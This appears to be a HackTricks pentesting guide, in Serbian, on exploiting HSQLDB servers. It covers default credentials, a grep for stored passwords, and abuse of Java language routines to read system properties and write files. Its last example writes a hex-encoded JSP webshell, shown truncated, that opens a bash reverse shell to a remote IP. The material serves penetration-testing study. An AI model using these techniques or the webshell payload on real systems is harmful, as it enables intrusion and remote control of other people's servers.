{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}


# Osnovne informacije

**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** je vodeći SQL relacijski sistem baza podataka napisan u Javi. Pruža mali, brzi višedretveni i transakcijski motor baze podataka sa tabelama u memoriji i na disku, i podržava ugrađene i serverske režime.

**Podrazumevani port:** 9001
```text
9001/tcp open  jdbc      HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
```
# Information

### Default Settings

Imajte na umu da je po defaultu ova usluga verovatno pokrenuta u memoriji ili je vezana za localhost. Ako ste je pronašli, verovatno ste iskoristili drugu uslugu i tražite da povećate privilegije.

Podrazumevani kredencijali su obično `sa` sa praznom lozinkom.

Ako ste iskoristili drugu uslugu, pretražite moguće kredencijale koristeći
```text
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
```
Napomena pažljivo zabeležite ime baze podataka - biće vam potrebno za povezivanje.

# Prikupljanje informacija

Povežite se na DB instancu preuzimanjem [HSQLDB](https://sourceforge.net/projects/hsqldb/files/) i ekstraktovanjem `hsqldb/lib/hsqldb.jar`. Pokrenite GUI aplikaciju \(eww\) koristeći `java -jar hsqldb.jar` i povežite se na instancu koristeći otkrivene/slabe akreditive.

Napomena: URL za povezivanje će izgledati otprilike ovako za udaljeni sistem: `jdbc:hsqldb:hsql://ip/DBNAME`.

# Trikovi

## Java jezičke rutine

Možemo pozvati statičke metode Java klase iz HSQLDB koristeći Java jezičke rutine. Imajte na umu da klasa koja se poziva mora biti u classpath-u aplikacije.

JRT-ovi mogu biti `funkcije` ili `procedure`. Funkcije se mogu pozivati putem SQL izjava ako Java metoda vraća jednu ili više SQL-kompatibilnih primitivnih promenljivih. Pozivaju se koristeći `VALUES` izjavu.

Ako Java metoda koju želimo da pozovemo vraća void, moramo koristiti proceduru koja se poziva sa `CALL` izjavom.

## Čitanje Java sistemskih svojstava

Kreirajte funkciju:
```text
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
```
Izvrši funkciju:
```text
VALUES(getsystemproperty('user.name'))
```
Možete pronaći [spisak sistemskih svojstava ovde](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).

## Pisanje sadržaja u datoteku

Možete koristiti `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget koji se nalazi u JDK \(automatski učitan u klasu aplikacije\) da biste zapisali heksadecimalno kodirane stavke na disk putem prilagođene procedure. **Napomena: maksimalna veličina je 1024 bajta**.

Kreirajte proceduru:
```text
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
```
Izvrši proceduru:
```text
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
```
{% hint style="success" %}
Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Podržite HackTricks</summary>

* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>
{% endhint %}